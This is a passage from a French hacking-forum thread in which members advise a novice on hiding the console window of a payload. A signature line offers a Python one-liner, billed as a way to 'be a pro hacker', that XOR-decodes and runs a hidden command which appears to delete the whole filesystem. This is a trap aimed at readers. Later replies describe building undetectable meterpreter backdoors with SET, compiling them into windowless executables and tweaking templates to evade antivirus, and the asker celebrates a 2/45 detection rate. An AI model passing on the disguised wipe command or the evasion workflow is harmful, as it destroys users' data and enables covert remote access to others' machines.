00000103  5E                pop si
00000104  5B                pop bx
00000105  C9                leave
00000106  C21000            ret 0x10
00000109  0A                db 0x0a

big_smile


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#16 14-06-2013 10:53:27

JeanCharles
Membre Indétronable
Lieu : Sainte-Anne
Inscription : 13-07-2012
Messages : 199

Re : Cacher fenêtre cmd à l'execution d'un payload

Il existe trois sortent de mathématiciens,
Ceux qui savent compter...
Ceux qui ne savent pas...
Et ceux qui comptent les moutons en hexadécimal...


« γνωθι σεαυτον »

Hors Ligne

#17 14-06-2013 22:38:53

Anthonyy59
Membre V.I.P.
Inscription : 03-09-2012
Messages : 277

Re : Cacher fenêtre cmd à l'execution d'un payload

Je vais sans doute passé pour le pire des noobs... Mais je n'ai aucune idée a quoi correspond toutes ces lignes.

Merci de ta réponse Spawn, elle m'a l'air déjà très complète mais j'ai encore quelques lacunes sur ces sujets. Tu ne pourrais pas m'éclairer un peu plus sur le sujet ou me dire ce que je pourrai taper sur le net pour trouver quelques tutos?

@JeanCharles, très beau moment de philosophie ! big_smile

Hors Ligne

#18 15-06-2013 00:18:48

JeanCharles
Membre Indétronable
Lieu : Sainte-Anne
Inscription : 13-07-2012
Messages : 199

Re : Cacher fenêtre cmd à l'execution d'un payload

Surtout ne vas jamais dans regedit! Tu risquerais d'avoir mal au crane si t'aimes pas l'hexa...

Dernière modification par JeanCharles (22-06-2013 19:12:52)


« γνωθι σεαυτον »

Hors Ligne

#19 19-06-2013 19:52:27

Anthonyy59
Membre V.I.P.
Inscription : 03-09-2012
Messages : 277

Re : Cacher fenêtre cmd à l'execution d'un payload

Quelqu'un pourrait m'éclairer? smile

Hors Ligne

#20 02-07-2013 02:45:31

warfares
Membre Hyperactif
Inscription : 01-04-2013
Messages : 52

Re : Cacher fenêtre cmd à l'execution d'un payload

SET fait des backdoor FUD, ça te donne un code batch que tu peux compiler avec des outils tels que ça.
Ça te fait un zoli exe de 7 ko qui n'ouvre aucune fenêtre si tu as bien utilisé le compilateur.

je cela trouve beaucoup plus pratique que tout ces trucs de crypter 20x etc... malgrès le fait qu'il faut au moins une machine virtuelle windows pour utiliser le compilateur.

Après il reste le problème des modules de meterpreter tels que la persistence, où du coup il faut modifier les templates, car eux resteront détectables. il y a des tutos sur le net .

J'utilise cette méthode pour backdoorer tous les windows des membres de ma famille, avec leur accord biensur, afin de les dépanner, car je trouve meterpreter plus convivial que ce que j'ai testé auparavant ( genre TEAMVIEWER ), tout en laissant les antivirus activés, et sans avoir besoin de sortir de ma chambre big_smile

Hors Ligne

#21 02-07-2013 09:12:29

Anthonyy59
Membre V.I.P.
Inscription : 03-09-2012
Messages : 277

Re : Cacher fenêtre cmd à l'execution d'un payload

Ça m'a l'air super intéressant !
Je vais essayer ça et aussi me renseigner sur les "batch" ça je ne sais pas ce que c'est !
Merci a toi warfares

Hors Ligne

#22 02-07-2013 14:21:04

warfares
Membre Hyperactif
Inscription : 01-04-2013
Messages : 52

Re : Cacher fenêtre cmd à l'execution d'un payload

pour info les "batch" c'est ce que tu as généré dans ton autre post ( les deux x64 et x86 renommés en .bat)

Hors Ligne

#23 02-07-2013 16:58:14

Anthonyy59
Membre V.I.P.
Inscription : 03-09-2012
Messages : 277

Re : Cacher fenêtre cmd à l'execution d'un payload

J'ai téléchargé Batch compiler, tu pourrai pas me dire comment je pourrai compiler ces fichiers? merci d'avance !

Hors Ligne

#24 02-07-2013 17:24:24

warfares
Membre Hyperactif
Inscription : 01-04-2013
Messages : 52

Re : Cacher fenêtre cmd à l'execution d'un payload

petit indice, tu copie ton code batch dans le grand champ de texte.
ensuite tu regardes les options et tu mets ce qui te semble convenable

Hors Ligne

#25 02-07-2013 23:51:31

Anthonyy59
Membre V.I.P.
Inscription : 03-09-2012
Messages : 277

Re : Cacher fenêtre cmd à l'execution d'un payload

J'ai fais comme tu m'as di warfares, ça donne de très bon résultats, un ratio de 2/45 c'est pas mal du tout !
Merci beaucoup !!!

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
0 1703 15-09-2015 02:11:34 par Blastpp
7 1410 04-10-2014 11:44:49 par koala
Aide Pour Payload par Benzilla
11 1348 29-10-2013 00:33:18 par Benzilla
7 3036 03-10-2013 19:40:20 par Fuji
10 7662 02-09-2013 14:41:34 par Anthonyy59

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.035 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]